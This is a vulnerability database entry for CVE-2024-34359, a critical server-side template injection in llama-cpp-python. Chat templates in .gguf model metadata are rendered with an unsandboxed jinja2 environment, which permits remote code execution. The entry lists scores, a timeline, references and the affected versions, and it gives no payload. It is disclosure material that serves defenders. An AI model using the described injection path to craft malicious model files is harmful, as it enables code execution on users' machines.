CVE-2024-34359

llama-cpp-python vulnerable to Remote Code Execution by Server-Side Template Injection in Model Metadata

Severity Score

9.6

*CVSS v3.1

Exploit Likelihood

*EPSS

Affected Versions

*CPE

Public Exploits

*Multiple Sources

Exploited in Wild

*KEV

Decision

Attend

*SSVC

Descriptions

llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` 's Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload.

llama-cpp-python son los enlaces de Python para llama.cpp. `llama-cpp-python` depende de la clase `Llama` en `llama.py` para cargar `.gguf` llama.cpp o modelos de aprendizaje automático de latencia. El constructor `__init__` integrado en `Llama` toma varios parámetros para configurar la carga y ejecución del modelo. Además de `NUMA, configuración de LoRa`, `carga de tokenizadores` y `configuración de hardware`, `__init__` también carga la `plantilla de chat` desde los metadatos `.gguf` específicos y además la analiza en `llama_chat_format.Jinja2ChatFormatter.to_chat_handler ()` para construir el `self.chat_handler` para este modelo. Sin embargo, `Jinja2ChatFormatter` analiza la `plantilla de chat` dentro del Metadate con `jinja2.Environment` sin zona de pruebas, que además se representa en `__call__` para construir el `mensaje` de interacción. Esto permite la inyección de plantilla del lado del servidor `jinja2`, lo que conduce a la ejecución remota de código mediante un payload cuidadosamente construida.

*Credits: N/A

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

Required

Scope

Changed

Confidentiality

High

Integrity

High

Availability

High

Attack Vector

Network

Attack Complexity

Low

Authentication

None

Confidentiality

Complete

Integrity

Complete

Availability

Complete

* Common Vulnerability Scoring System

SSVC

Decision:Attend

Exploitation

Poc

Automatable

Tech. Impact

Total

* Organization's Worst-case Scenario

Timeline

2024-05-02 CVE Reserved
2024-05-10 CVE Published
2024-05-11 EPSS Updated
2024-08-02 CVE Updated
---------- Exploited in Wild
---------- KEV Due Date
---------- First Exploit

CWE

CWE-76: Improper Neutralization of Equivalent Special Elements

CAPEC

References (2)

URL	Tag	Source
https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df	X_refsource_misc
https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829	X_refsource_confirm

URL	Date	SRC

URL	Date	SRC

URL	Date	SRC

Affected Vendors, Products, and Versions

Vendor		Product				Version		Other		Status
Vendor	Product	Version	Other	Status	<-- -->	Vendor	Product	Version	Other	Status
Abetlen Search vendor "Abetlen"		Llama-cpp-python Search vendor "Abetlen" for product "Llama-cpp-python"				>= 0.2.30 <= 0.2.71 Search vendor "Abetlen" for product "Llama-cpp-python" and version " >= 0.2.30 <= 0.2.71"		en		Affected